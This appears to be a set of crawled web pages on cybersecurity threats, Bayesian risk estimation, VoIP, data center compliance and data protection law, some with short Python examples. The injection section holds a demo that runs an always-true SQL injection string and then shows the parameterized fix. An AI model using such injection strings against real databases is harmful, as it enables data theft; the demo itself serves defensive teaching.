In a study published in the Journal of the American Medical Association, it was discovered that many hospital employees still fall for phishing emails, with one out of seven recipients clicking on a phishing email in a simulated phishing test.
This shows that many hospital employees have difficulty spotting a phishing email, which makes hospitals highly vulnerable to phishing scams. What's worse is that it only takes one successful phishing attack to compromise an entire healthcare organization's IT system.
2. Business email compromise (BEC)
BEC is a cyberattack targeting organizations working with businesses that regularly perform wire transfer payments. This attack compromises or fakes corporate email accounts to conduct unauthorized fund transfers. A BEC attack can be done in two ways:
- CEO fraud: A hacker poses as a high-level employee of a company and requests payments from customers and partners.
- Invoice payment requests: A hacker pretends to be a legitimate vendor and sends a fake invoice requesting a payment usually via wire transfer.
BEC scams have destructive effects on businesses. In fact, between January 2014 and October 2019, the FBI Internet Crime Complaint Center received complaints equating to more than $2.1 billion in losses from BEC scams.
Ransomware is a malicious program that encrypts a computer’s files and applications, and threatens to prevent access to data and/or systems unless a ransom is paid. Such attacks are damaging to healthcare organizations because these could affect their ability to deliver proper patient care, and even endanger the lives of patients.
In August 2019, physicians from a Washington hospital were forced to document cases on paper after their organization was hit with ransomware. And in late 2020, hospitals became the main target of the Ryuk ransomware, a targeted attack that was responsible for 75% of the ransomware attacks on the US healthcare sector.
Healthcare businesses are more likely to pay the ransom than deal with downtime, which is why cybercriminals commonly target them. Unfortunately, paying will not always guarantee the recovery of data or access to the system, as some cybercriminals may refuse to give a decryption key. Some attackers may even publish the data they stole, if a company refuses to pay the ransom.
4. Distributed denial-of-service (DDoS) attacks
In a DDoS attack, cybercriminals use thousands of computers to target an internet-accessible system and flood it with connection requests. Once the traffic becomes too heavy, the network will crash and become unusable.
This poses a serious threat to companies that rely on constant access to their network to operate and provide proper patient care. For this reason, healthcare companies must remain alert to such attacks because DDoS attacks on healthcare systems rose substantially in 2020 when the pandemic forced many businesses, including healthcare organizations, to go digital. It is predicted that cybercriminals will continue targeting the industry in 2021.
Don’t let cybercriminals compromise your company’s security and steal your data. Partner with a trusted managed IT services provider like Healthy IT. Our top-class Cybersecurity Solutions will provide your healthcare practice with multilayered security and 24/7 surveillance to keep your data constantly protected. To learn more about cybersecurity best practices, download our FREE eBook today! | <urn:uuid:5b5d238a-86db-47ba-9a14-5658dc1f2646> | CC-MAIN-2024-38 | https://www.myhealthyit.com/the-4-most-common-healthcare-cyberthreats/ | 2024-09-12T03:13:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00323.warc.gz | en | 0.959816 | 971 | 2.65625 | 3 |
The internet is an ever-changing landscape. As new technologies are created, hackers find ways to exploit them for their gain. Sometimes the damage can be minimal, but other times it can be devastating. In this blog post, we will look at 5 of the most dangerous types of cyber-attacks that your business may face and how you can protect yourself against them.
One of the most common cyber-attacks is a denial-of-service or DOS attack. This type of attack occurs when hackers send an overwhelming number of requests to your website/server, overloading it and causing service interruptions that can last for hours.
There are several mitigation techniques you should put in place, including cloud-based servers that provide high availability, failover capability in case one server goes offline, and load balancers that distribute traffic across multiple machines so that if one fails, another will take its place.
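The load-balancing idea mentioned above, at its simplest, is just rotating incoming requests across a pool of servers. A minimal round-robin sketch (the server names are placeholders, and real balancers add health checks and automatic failover):

```python
import itertools

class RoundRobinBalancer:
    """Minimal sketch of round-robin distribution; production load
    balancers also health-check servers and fail over automatically."""

    def __init__(self, servers):
        self._cycle = itertools.cycle(servers)

    def next_server(self):
        return next(self._cycle)

lb = RoundRobinBalancer(["app-1", "app-2", "app-3"])  # placeholder names
print([lb.next_server() for _ in range(5)])
# ['app-1', 'app-2', 'app-3', 'app-1', 'app-2']
```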
Recent DOS attacks
Wikipedia is an unparalleled treasure trove of knowledge translated into more than 250 languages and viewed by over one billion people. However, this didn’t stop them from being targeted in a DDoS attack back in 2019, which caused the site to be down for European, Middle Eastern, and American users for over nine hours.
Phishing attacks are one of the most dangerous cyber-attacks because hackers prey on unsuspecting users by sending emails that appear to be sent from a trusted source to get personal information or an account password.
You can protect yourself by training employees not to click links within emails but instead go directly to websites using bookmarks or typing them into their browser.
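One way to operationalize the "go directly to known sites" advice is a hostname allowlist check, which catches lookalike domains even when the visible link text appears legitimate. A minimal sketch (the domains shown are hypothetical):

```python
from urllib.parse import urlparse

# Hypothetical allowlist -- in practice this would hold your
# organization's known-good domains.
TRUSTED_HOSTS = {"example-bank.com", "www.example-bank.com"}

def looks_trusted(url):
    """Crude hostname allowlist check: lookalike domains used in
    phishing mail fail it even when the link text looks legitimate."""
    return urlparse(url).hostname in TRUSTED_HOSTS

print(looks_trusted("https://www.example-bank.com/login"))      # True
print(looks_trusted("https://example-bank.com.evil.io/login"))  # False
```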
Recent phishing attacks
One of the best-known security breaches in recent history was caused by phishing emails sent to Sony employees. After posing as employees whom they found on social sites like LinkedIn, hackers were able to gain over 100 terabytes of data, costing the company an estimated 100 million dollars.
Man in the Middle (MITM)
A man-in-the-middle attack is when a hacker inserts themselves between you and another person so they can intercept traffic such as emails, instant messages, or passwords.
You must always be vigilant about what websites your employees visit, including their connection security which means knowing if SSL certificates have expired or not, among other things.
Recent man in the middle attacks
A recent hacking incident has been reported, in which hackers pulled off a man-in-the-middle attack to steal from an Israeli startup. The hackers ended up intercepting a $1 million wire transfer from a Chinese venture capital firm that was meant for the startup.
Malware attacks occur when a hacker inserts malicious software on your computer or network that can come in many different forms.
You can protect yourself by installing anti-malware tools such as antivirus solutions that have an active protection component built into it where they work constantly scanning files for threats before they get a chance to execute.
Recent malware attacks
Hackers exploited the fear brought on with COVID-19 by creating the CovidLock ransomware. The app seemed to be a COVID tracking tool, alerting individuals of hot spots and areas with a higher infectivity rate, but it was a front for a vicious malware attack.
The app infected users’ phones and locked their data until they paid $100 in bitcoin for recovery services. By asking users to give administrative access to their devices, the cybercriminals had access to a slew of personal information from their victims.
An injection attack is when hackers exploit code in your website to access sensitive information such as login credentials or financial data.
The best way you can protect yourself from these types of cyber-attacks is by logging everything that happens within your network, including suspicious activities, whether on a gateway, a server, or any other connected device; some monitoring tools can also provide real-time alerts if something does happen.
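Beyond logging, the standard code-level defense against SQL injection is to pass user input through parameterized queries rather than splicing it into SQL strings. A minimal sketch using Python's built-in sqlite3 module:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

attacker_input = "' OR '1'='1"

# Vulnerable: attacker-controlled text is spliced into the SQL string,
# so the WHERE clause becomes always-true and leaks every row.
unsafe = f"SELECT role FROM users WHERE name = '{attacker_input}'"
print(conn.execute(unsafe).fetchall())                   # [('admin',)]

# Safe: the driver treats the bound value strictly as data, not SQL.
safe = "SELECT role FROM users WHERE name = ?"
print(conn.execute(safe, (attacker_input,)).fetchall())  # []
```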
Recent injection attacks
In 2017, a hacker was able to breach government agencies and 63 different universities across the globe using SQL injection attacks. Though it's not entirely known which systems were compromised, the stolen information could include private data about staff and students, as well as intellectual property such as research findings or patented inventions.
As a trusted provider for managed IT services, Innovative Network Solutions can help you implement security measures that will keep hackers away. If your business is interested in learning more about how to stay protected from some of the most dangerous types of cyber-attacks out there, contact our cybersecurity experts today. | <urn:uuid:dd89f937-dc80-42d7-8fa3-c195e44e23df> | CC-MAIN-2024-38 | https://www.inscnet.com/blog/the-5-most-dangerous-types-of-cyber-attacks/ | 2024-09-16T22:50:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00823.warc.gz | en | 0.95054 | 903 | 2.5625 | 3 |
The Government Performance and Results Modernization Act of 2010 (GPRAMA) was intended to provide federal leaders with objective program effectiveness information and aid in federal agency decision-making. However, a Government Accountability Office (GAO) survey of federal managers, GAO-13-518, indicated a widespread absence of program evaluations, as well as a lack of progress in the use of available performance information.
In order to identify areas for improvement, the GAO recently conducted a study, Program Evaluation: Some Agencies Reported that Networking, Hiring, and Involving Program Staff Help Build Capacity. The study reviewed the capacity of federal agencies to conduct and use program evaluations.
Program evaluations are methodical analyses that review specific issues of program performance. While program measurement generally tracks progress against goals determined at the program outset, program evaluation “typically assesses the achievement of a program’s objectives and other aspects of performance in the context in which the program operates.”
One objective of the GAO study was to identify activities that are useful in building capacity to conduct and use program evaluations. The GAO study surveyed performance improvement officers at 24 agencies, which included DoD and civilian agencies. According to the study, the most useful activities for increasing capacity to conduct evaluations include:
- Hiring – Recruit personnel with research and analysis experience. Some agencies use hiring programs such as Presidential Management Fellows, Intergovernmental Personnel Act or the American Association for the Advancement of Science fellows program.
- Professional Networking – Encourage staff to participate in conferences or related interest groups. One example mentioned by those surveyed was the Association for Public Policy Analysis and Management Research Conference.
- Consulting experts – Consider consulting with experts for theoretical or technical support; identifying areas in which agency staff may need additional assistance.
- Training – Build staff capacity through specific skills and knowledge training. Personnel may benefit from classroom or online training in areas such as data and statistical analysis techniques, design of program evaluations, and converting evaluation results into agency recommendations.
- Accountability – Holding leaders accountable and conducting quarterly progress reviews were mentioned by several study respondents as beneficial for improving agency ability to conduct evaluations.
Once an agency is successfully conducting evaluations, it is essential to apply the acquired information to improve outcomes. The performance improvement officers surveyed identified quarterly progress reviews, engaging staff, and enforcing accountability for agency goals as activities which promote the use of evaluations in decision-making. In particular, including staff throughout the program evaluation process generates early buy-in of evaluation findings.
Developing capacity to conduct and use program evaluations can allow agencies to be better informed for future decisions. With some intentional planning, infrastructure activities such as hiring practices, networking, training, support services and accountability structure can be harnessed to improve outcomes and ultimately, mission objectives. | <urn:uuid:03dbdabf-927e-43e0-aab6-def4061a87f0> | CC-MAIN-2024-38 | https://changeis.com/innovategov/gao-using-program-evaluations-for-more-effective-management/ | 2024-09-18T04:50:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00723.warc.gz | en | 0.939745 | 563 | 2.609375 | 3 |
One of the main obstacles to adopting a quantitative approach to risk management is the claim that major security breaches are relatively rare and hence there cannot be enough data for proper statistical analysis. While this might be true in the classical sense, it is not if we adopt a Bayesian mindset, which basically amounts to being open to changing your beliefs in light of new evidence.
Remember the Rule of 5? It allows us to give a 90% confidence interval with only 5 samples. This is already a counterexample for the "not enough data" obstacle. Also recall how we used probability distributions in order to run simulations on many possible scenarios and updated our beliefs based upon evidence, all based only on a few expertly estimated probabilities. In this article we will show how a probability distribution can be derived from simple observations.
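The Rule of 5 itself is easy to check empirically: the chance that all 5 random samples land on the same side of the median is 2 * 0.5^5 = 6.25%, so the sample's min-max range contains the population median 93.75% of the time, comfortably above 90%. A minimal simulation (pure Python; the population used here is an arbitrary stand-in):

```python
import random
import statistics

def rule_of_five_coverage(population, trials=20_000, seed=0):
    """Fraction of trials in which the population median lies between the
    min and max of 5 random samples (theory: 1 - 2 * 0.5**5 = 93.75%)."""
    rng = random.Random(seed)
    median = statistics.median(population)
    hits = 0
    for _ in range(trials):
        sample = rng.sample(population, 5)
        if min(sample) <= median <= max(sample):
            hits += 1
    return hits / trials

# Works for any population: the rule is distribution-free.
coverage = rule_of_five_coverage(list(range(1, 1001)))
```

Running this yields a coverage close to the theoretical 93.75%, regardless of the population you plug in.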
Suppose we want to estimate the batting average (the ratio of hits to the number of times a player stands at bat) for a particular player. One way to do so would be to look at their rolling average, i.e., their average so far. The law of large numbers tells us that no matter what happens at the beginning, the rolling average will tend to the true value, if you observe it for long enough:
Rolling average tends to the true mean. Via Brad DeLong.
The only problem is, we don’t have long enough. Baseball seasons are finite, and major cybersecurity events are few and far between. What is one to do? If we go with the rolling average like in the above image, we would be stuck with the initial, imprecise part of it. For instance, after the first try, the player’s average will be either exactly 0 or 1, which clearly does not reflect the reality well.
Enter the beta probability distribution. This distribution takes two parameters which determine its shape and spread, cryptically called alpha and beta, but in reality they can be thought of as hits and misses from a certain sample. We may also think of the density function of this distribution as giving us the probability that a proportion, ratio or probability of an event takes a given value. No, that was not a typo: we can think of the beta distribution as being the probability distribution of probabilities themselves. As such, we can use it to obtain the probability of being attacked after having observed who has been attacked (the hits) and who has not (the misses) in a certain period of time.
Beta distribution with different parameters. By Shona Shields on Slideplayer.
Wait: it gets better. The beta distribution can be updated with evidence and observations, just like we did when working with Bayes Rule, to give better estimations. Since alpha and beta represent hits and misses, if we observe some breaches and some non-breaches, why not just add them to the original parameters?
It can be shown that the beta distribution, modified this way, reflects reality much better than the previous estimate. And we can keep updating it iteratively every time there is a new observation.
Imagine an even simpler situation: what is the probability that a coin lands heads? We don’t know whether the coin is fair or has been loaded to favor some results over others, so we might just toss it many times, record the results (how many heads and how many tails) and fit a beta distribution in the manner described above. The results would be as follows:
Adjusting a beta distribution to new evidence.
Notice how the distributions after the first two tosses, both resulting in heads, do not just say that the probability of heads is 100%, which is what the rolling average would point to and which is clearly wrong. Instead, the beta distribution smooths out what would be a sharp, extreme yes/no situation, allowing a chance for values in between. After only 3 tosses the distribution starts to look like a proper distribution: it gives the probability that the probability of obtaining heads has a certain value. After 50 tosses we can conclude, with evidence and a mathematically sound supporting method, that the coin was fair after all.
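The update rule behind those plots is plain arithmetic on the two parameters. A minimal sketch in pure Python (the seed and toss count are chosen only for illustration):

```python
import random

def update_beta(alpha, beta, hits, misses):
    """Bayesian update of a beta prior: successes add to alpha, failures to beta."""
    return alpha + hits, beta + misses

rng = random.Random(42)
alpha, beta = 1, 1                 # uniform prior: every bias equally plausible
for _ in range(50):
    heads = rng.random() < 0.5     # toss a fair coin
    alpha, beta = update_beta(alpha, beta, int(heads), int(not heads))

posterior_mean = alpha / (alpha + beta)  # expected probability of heads
```

After 50 tosses the posterior mean sits near 0.5, and the total alpha + beta grows by exactly one per observation, which is all the "iterative updating" amounts to.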
Next, how do we go about applying this to security breaches? What exactly would be the "hits" and the "misses"? Recall that we update our knowledge of hits and misses by taking random (though typically small) samples from an unknown, allegedly large population. Since we want to estimate the probability that a business like our own would suffer a major attack, the population should be a list of companies similar to ours. Call that the top 10, 100, etc. of your country/region/world. Out of those, take a random sample, and check against a public database of cybersecurity events (such as the Verizon Data Breach Investigations Report) to see if any of the sampled companies suffered an attack.
We also need seeds for the alpha and beta parameters. These could be expert estimations or, if you want to be very conservative, you can set both to 1, which would give simply a uniform distribution (everything is equally likely). This is the most uninformative of all possible priors. It is totally unbiased. Again, by the law of large numbers, it doesn’t really matter much where we begin. But the better the initial estimates, the faster the convergence to the "truth". Starting with this uniform prior and observing that there is one attacked company in the sample over a 2-year period, we obtain the following beta distribution:
Beta distribution for breach frequency.
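To make that concrete, here is a sketch of the computation. The sample size of 30 peer companies is a hypothetical assumption (the article does not state one), as is the random seed; beta samples are drawn with the standard library's gamma generator, since a Beta(a, b) variate equals X/(X+Y) for X ~ Gamma(a), Y ~ Gamma(b):

```python
import random

def beta_sample(a, b, rng):
    """Draw from Beta(a, b) using two gamma draws (standard library only)."""
    x = rng.gammavariate(a, 1.0)
    y = rng.gammavariate(b, 1.0)
    return x / (x + y)

# Hypothetical survey: 1 breached company in a random sample of 30 peers.
breached, sample_size = 1, 30
a, b = 1 + breached, 1 + (sample_size - breached)  # posterior: Beta(2, 30)

rng = random.Random(7)
draws = sorted(beta_sample(a, b, rng) for _ in range(10_000))
mean_p = sum(draws) / len(draws)        # analytic mean would be 2/32 = 6.25%
ci_90 = (draws[500], draws[9500])       # empirical 5th and 95th percentiles
```

The 90% interval comes straight from the sorted draws, which is exactly the "we know pretty much everything" point: once the distribution is fitted, any summary is a one-liner.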
When we have a distribution, we know pretty much everything. We can find an expected probability of attack or, better yet, a 90% confidence interval in which that probability lies. We can also use it to update our previous models. Remember that in our simulations to obtain the Loss Exceedance Curve, we used a log-normal distribution simply because it was the best fit due to some of its properties. Now we have a better reason to use the beta distribution we obtained here, and running the simulations again with this distribution would yield the following results:
Notice how, by using the beta distribution, it is clear that higher losses are more likely, while smaller losses are less so. Given that this beta distribution was built using real data, this should be a more appropriate estimate of reality.
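A sketch of such a simulation combines the fitted beta distribution for breach frequency with a log-normal severity model. Note that the Beta(2, 30) posterior and the log-normal parameters (mu=12.0, sigma=1.5) below are illustrative assumptions, not values taken from the article:

```python
import random

def beta_sample(a, b, rng):
    """Beta(a, b) draw via two gamma draws (standard library only)."""
    x = rng.gammavariate(a, 1.0)
    y = rng.gammavariate(b, 1.0)
    return x / (x + y)

def simulate_year(rng, a=2, b=30, mu=12.0, sigma=1.5):
    """One simulated year: the breach probability is itself drawn from the
    fitted Beta(a, b); if a breach occurs, its cost is log-normal."""
    if rng.random() < beta_sample(a, b, rng):
        return rng.lognormvariate(mu, sigma)
    return 0.0

rng = random.Random(1)
losses = [simulate_year(rng) for _ in range(20_000)]
# One point on the loss exceedance curve: P(annual loss > $1M)
p_exceed_1m = sum(loss > 1_000_000 for loss in losses) / len(losses)
```

Sweeping the threshold over a range of loss amounts traces out the full Loss Exceedance Curve; here we compute just one point of it.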
Thus, the Bayesian interpretation of statistics and, in particular, the iterative updating of a fitted beta distribution can aid your company in better understanding risk, and not only in cybersecurity, since nothing in this method is inherent to cybersecurity risk. Especially in combination with random simulations, which turn these abstract distributions into concrete bills and coins.
C. Davidson-Pilon (2019). Probabilistic Programming and Bayesian Methods for Hackers.
D. Hubbard, R. Seiersen (2016). How to Measure Anything in Cybersecurity Risk. Wiley.
M. Richey and P. Zorn (2005). Basketball, Beta, and Bayes. Mathematics Magazine, 78(5), 354.
D. Robinson (2015). Understanding the beta distribution (using baseball statistics). Variance Explained.
The cloud has had a significant impact on traditional phone system technology, leading to the widespread adoption of Voice over Internet Protocol (VoIP) systems. VoIP is a type of phone system that uses the internet to transmit calls, rather than traditional phone lines.
One of the main benefits of VoIP is that it allows users to make and receive calls from any location with an internet connection. This is particularly useful for businesses that have employees working remotely or in multiple locations, as it allows them to stay connected and collaborate effectively.
VoIP systems can also be integrated with other communication and collaboration tools, such as video conferencing and instant messaging, which can further enhance productivity and collaboration. In addition, VoIP systems can often be customized with features such as call forwarding, voicemail, and call waiting, which can be useful for businesses of all sizes.
One of the main drivers of the move towards VoIP has been the increasing adoption of cloud-based solutions. Cloud-based VoIP systems are typically hosted and maintained by a third party, which means that businesses do not need to invest in and maintain their own hardware and infrastructure. This can be particularly appealing for small and medium-sized businesses, as it can help to reduce upfront costs and IT burden.
In addition to the benefits of VoIP, there are also some potential drawbacks to consider. For example, VoIP systems rely on a reliable internet connection in order to work properly, so if the internet goes down, phone service will be disrupted. In addition, VoIP systems may not be suitable for businesses that require a high level of security for their phone calls, as it may be more difficult to guarantee the security of internet-based calls compared to traditional phone lines.
In conclusion, the impact of the cloud on traditional phone system technology has been significant, leading to the widespread adoption of VoIP systems. VoIP systems offer a range of benefits, including the ability to make and receive calls from any location with an internet connection, integration with other cloud communication and collaboration tools, and customization with a range of features. However, it is important for businesses to carefully consider the potential drawbacks of VoIP, including the reliance on a reliable internet connection and potential security concerns. | <urn:uuid:dad74da1-72cd-433e-9fe2-ceb7dcd60496> | CC-MAIN-2024-38 | https://em360tech.com/tech-article/impact-cloud-traditional-phone-system-technology-and-move-towards-voip | 2024-09-08T12:13:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00723.warc.gz | en | 0.966986 | 449 | 2.96875 | 3 |
Data governance is now core to the operations of just about all modern businesses. For the vast majority of businesses, a part of this involves ensuring compliance with certain data security standards. With that in mind, here is a quick guide to what you need to know about compliance in data centers.
Compliance in data centers is the process of achieving and maintaining demonstrable adherence to mandated data security standards. These data security standards are typically set down by regulatory bodies and relate to the areas they oversee. For example, the Payment Card Industry Security Standards Council (PCI SSC) oversees PCI/DSS.
Sometimes, data security standards are set down by a government or government agency. In general, however, these data security standards relate to the government body itself. For example, FedRAMP is overseen by the U.S. federal government and relates to working with the U.S. federal government.
Data sovereignty rules are the rules that determine which government(s) has/have jurisdiction over what data. These data sovereignty rules may in turn determine how data is to be treated. This means that data sovereignty rules can have much the same impact as compliance rules. Technically, however, they are different.
For example, if data relates to EU residents (not just citizens), the EU automatically claims data sovereignty over it. The EU requires all entities handling this data to comply with its general data protection regulations (GDPR). GDPR is not, technically, a compliance program. Effectively, however, it operates as one and is often treated as one.
Here are five of the main challenges in achieving and maintaining compliance in data centers along with some suggestions on how you can address them.
Implement a robust compliance management system that centralizes all relevant regulations and standards. Utilize automated tools for tracking updates and changes in regulations. Regularly engage legal and compliance experts to interpret and apply complex requirements accurately.
Continuously monitor industry sources for information about regulatory and legal changes. Establish a dedicated team responsible for tracking emerging standards and laws. Implement agile compliance processes that can quickly adapt to new requirements through regular review and updates of policies and procedures.
Conduct thorough research to understand jurisdiction-specific regulations applicable to data center operations. Develop a comprehensive compliance strategy that accounts for variations in legal requirements across different regions. Implement centralized compliance controls and procedures to ensure consistency in operations across jurisdictions.
Employ industry-standard encryption protocols to protect data both in transit and at rest. Implement robust access controls and authentication mechanisms to limit unauthorized access to sensitive data. Regularly conduct vulnerability assessments and penetration testing to identify and address security vulnerabilities promptly.
Perform thorough security assessments of third-party vendors before integrating their services. Implement secure APIs and communication protocols to facilitate data exchange securely. Establish contractual agreements with vendors to enforce security standards and data protection requirements. Regularly monitor and audit third-party activities to ensure compliance with security policies.
Here is an overview of 7 best practices for achieving compliance in data centers.
Maintain comprehensive documentation of security policies, procedures, configurations, and audit trails. Utilize documentation management tools to organize and centralize security documentation for easy access and reference during audits and assessments.
Conduct periodic security audits and assessments to identify vulnerabilities, misconfigurations, and compliance gaps. Utilize automated scanning tools and manual penetration testing to evaluate the effectiveness of security controls.
Implement continuous monitoring tools and techniques to detect security incidents and anomalies in real time. Establish an incident response plan outlining procedures for responding to security incidents, including containment, eradication, and recovery measures.
Enforce granular access controls based on the principle of least privilege (POLP). Utilize role-based access control (RBAC) to restrict access to sensitive data and systems only to authorized personnel.
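A role-based check can be as small as a dictionary lookup. The sketch below uses hypothetical roles and permission strings; the point is least privilege in miniature, where anything not explicitly granted is denied:

```python
# Minimal role-based access control (RBAC) sketch. The roles and
# permission names are hypothetical, not taken from any specific product.
ROLE_PERMISSIONS = {
    "auditor":  {"read:logs"},
    "operator": {"read:logs", "restart:service"},
    "admin":    {"read:logs", "restart:service", "read:pii", "manage:users"},
}

def is_allowed(role, permission):
    """Grant access only if the role explicitly holds the permission
    (principle of least privilege: anything not granted is denied)."""
    return permission in ROLE_PERMISSIONS.get(role, set())
```

With this layout, an auditor can read logs, but a request for `read:pii` from anyone other than an admin is denied by default, including requests from unknown roles.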
Utilize strong encryption algorithms (e.g., AES 256-bit) to encrypt data both at rest and in transit. Implement secure transport protocols such as TLS/SSL for encrypting data during transmission over networks.
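For the in-transit half, a client can refuse legacy protocol versions outright. A minimal sketch using Python's standard `ssl` module (the hostname in the comment is a placeholder):

```python
import ssl

# Enforce modern TLS for data in transit: refuse anything below TLS 1.2
# and keep certificate and hostname verification on (the defaults for
# a default client context).
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
context.minimum_version = ssl.TLSVersion.TLSv1_2

# A connection would then be wrapped with, e.g.:
#   context.wrap_socket(sock, server_hostname="example.com")
# where "example.com" is a placeholder for the real peer.
```

Centralizing context creation like this makes the minimum protocol version an auditable, single-point configuration rather than a per-connection decision.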
Deploy IDPS to monitor network traffic and detect suspicious activities or intrusion attempts. Configure IDPS to automatically block or mitigate detected threats in real time to prevent unauthorized access or data breaches.
Implement secure configuration management practices to ensure systems and devices are configured according to security best practices and compliance requirements. Utilize configuration management tools to enforce standardized configurations and detect unauthorized changes.
Table of Contents
In the digital age, data has become an invaluable asset. Every swipe on a smartphone, every click on a website & every online transaction generates a trove of information that, in totality, forms an intricate web of digital footprints. As businesses and organizations increasingly shift operations online, the volume of personal digital data has skyrocketed. It’s not just about names and email addresses anymore. Today, data encompasses browsing habits, purchasing behaviors, geolocations, biometrics & so much more. In essence, our digital personas now reflect who we are just as much as our real-world interactions.
Yet, with this proliferation of digital data comes a myriad of challenges. How do we ensure that individuals’ data isn’t misused? What steps can be taken to prevent unauthorized access or leaks? More than ever, there’s a pressing need for robust legal frameworks that protect personal digital data. Such structures aim not just to shield individuals from potential misuse but also to instill confidence in digital interactions, assuring people that their digital selves are safeguarded.
Background of the Digital Personal Data Protection Act
The inception of the Digital Personal Data Protection Act didn’t occur in a vacuum. Historically, as technology evolved and the internet became ubiquitous, the initial euphoria of the World Wide Web gave way to growing concerns about data privacy. Reports of significant data breaches, where millions of users’ data were compromised, started making headlines. The misuse of personal data by corporations for profit, without explicit user consent, became a contentious issue.
Global incidents further fueled the fire. High-profile cases, like the Cambridge Analytica scandal, brought data privacy discussions to dinner tables. It became evident that while technology had advanced by leaps and bounds, regulations were lagging. There was a glaring gap between what technology could do with data and what it ethically should do.
Moreover, as international trade and collaborations expanded, there arose a need for standardization. Different countries began enacting their own data protection acts, each with its nuances. Organizations operating globally found themselves navigating a patchwork quilt of regulations. There was a clear necessity for a more unified approach, at least in terms of fundamental principles.
Objective and Purpose of the Digital Personal Data Protection Act
With the background established, the Digital Personal Data Protection Act was conceptualised with specific goals in mind.
Primary Goals:
Protection of Individual Rights: At its core, the act seeks to uphold and protect the rights of individuals regarding their personal data. This encompasses not just the security of the data but also the control individuals have over it.
Standardisation: By setting clear guidelines and regulations, the act aims to provide a standardised framework that organisations can adhere to, ensuring consistency in data protection measures across the board.
Accountability and Transparency: One of the pivotal objectives is to hold organisations accountable for the data they collect and process. This involves ensuring transparency in how data is used and providing recourse in case of violations.
Alignment with International Standards: The Digital Personal Data Protection Act, while catering to specific regional or national needs, also recognizes the global nature of digital data. As such, it has been crafted keeping in mind international data protection standards, such as the General Data Protection Regulation (GDPR) of the European Union. This alignment ensures that businesses operating in multiple jurisdictions have a cohesive set of principles to adhere to, minimising conflicts and overlaps. It also signifies a global collaborative effort towards a digital future where data protection is paramount.
Core Provisions of the Act
The Digital Personal Data Protection Act isn’t just a paper tiger; it has been meticulously crafted, encompassing various provisions that set the bedrock for digital data protection. Let’s explore its key components.
Definition of Personal Data: In the digital realm, the term ‘personal data’ can be vast and multifaceted. Under the act, personal data refers to any information, whether stored electronically or in physical form, that can be used to directly or indirectly identify an individual. This could range from obvious identifiers like names and addresses to more nuanced data like IP addresses, browser cookies, or even behavioural patterns.
Consent Requirement: The act emphasises the sanctity of individual consent. Organisations are mandated to obtain clear, informed & explicit consent from individuals before collecting, processing, or sharing their data. This means gone are the days of ambiguous terms and conditions buried in fine print. Consent forms must be clear, concise & transparent about the data’s intended use.
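As an illustration of what "clear, informed & explicit" consent implies for implementers, here is a hypothetical sketch of a purpose-bound, revocable consent record. The field names are assumptions for illustration, not structures mandated by the act:

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

# Hypothetical auditable consent record: explicit purpose, a timestamp,
# and revocation support, reflecting the act's consent provisions.
@dataclass
class ConsentRecord:
    subject_id: str
    purpose: str                          # the specific, stated use of the data
    granted_at: datetime
    revoked_at: Optional[datetime] = None

    def is_active(self):
        return self.revoked_at is None

    def revoke(self):
        self.revoked_at = datetime.now(timezone.utc)

consent = ConsentRecord("user-42", "order fulfilment",
                        granted_at=datetime.now(timezone.utc))
```

Storing consent this way gives an organization an audit trail: who agreed, to what purpose, when, and whether the consent still stands.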
Data Minimization Principle: Holding vast amounts of unnecessary data isn’t just ethically questionable; under the act, it’s discouraged. The data minimization principle mandates that organizations should only collect data pertinent to their specified purpose & no more. This not only reduces potential risks but also encourages efficient data management practices.
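In code, data minimization can amount to a whitelist of fields per declared purpose. A hypothetical sketch (the purpose and field names are illustrative only):

```python
# Data-minimization sketch: discard any submitted field that is not
# declared as necessary for the stated purpose.
DECLARED_FIELDS = {
    "order_fulfilment": {"name", "email", "shipping_address"},
}

def minimise(purpose, submitted):
    """Keep only the fields declared as necessary for this purpose."""
    allowed = DECLARED_FIELDS.get(purpose, set())
    return {key: value for key, value in submitted.items() if key in allowed}

collected = minimise("order_fulfilment", {
    "name": "A. Sharma",
    "email": "a@example.com",
    "shipping_address": "12 Park Street",
    "date_of_birth": "1990-01-01",   # irrelevant to the purpose -> dropped
})
```

Filtering at the point of collection means unnecessary data never enters storage in the first place, which is cheaper than deleting it later.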
Rights of Data Subjects:
Right to Access: Individuals have the right to access their data held by organizations. This ensures transparency, allowing individuals to know what data is being stored and how it’s being used.
Right to Rectification: Mistakes happen. If an individual finds inaccurate or incomplete data about themselves stored by an organization, they have the right to request corrections.
Right to Erasure (‘Right to be Forgotten’): This provision allows individuals to request that their data be deleted from an organization’s records, especially if the data is no longer necessary for its initial purpose or if the individual revokes their consent.
Right to Data Portability: Individuals can request a copy of their data in a structured and commonly-used format, ensuring they can easily transfer their data from one service provider to another if they wish.
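A sketch of what honoring a portability request might look like: export the subject's records in a structured, commonly-used format such as JSON. The store and its contents below are hypothetical:

```python
import json

# Right-to-portability sketch: hand the subject their data as JSON,
# a structured, machine-readable, commonly-used format.
def export_subject_data(subject_id, store):
    record = store.get(subject_id, {})
    return json.dumps({"subject_id": subject_id, "data": record},
                      indent=2, sort_keys=True)

store = {"user-42": {"email": "a@example.com", "orders": 3}}
portable = export_subject_data("user-42", store)
```

Because the output is plain JSON, the individual (or a competing provider, with the individual's consent) can ingest it without bespoke tooling.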
Data Protection Officer (DPO): To ensure adherence to the act, organizations, especially those dealing with vast amounts of personal data, are required to appoint a Data Protection Officer. The DPO acts as the torchbearer for data protection within the organization, ensuring compliance, addressing concerns & acting as a bridge between the organization and regulatory authorities.
Cross-border Data Transfer: In our globalized world, data often needs to flow across borders. However, this transfer isn’t unrestricted. The act sets forth rules ensuring that personal data isn’t compromised when transferred internationally. Organizations are required to ensure that the destination country or entity offers an equivalent level of data protection.
Enforcement and Penalties
For a law to be effective, robust enforcement mechanisms are pivotal. The act isn’t just a guideline; it has teeth.
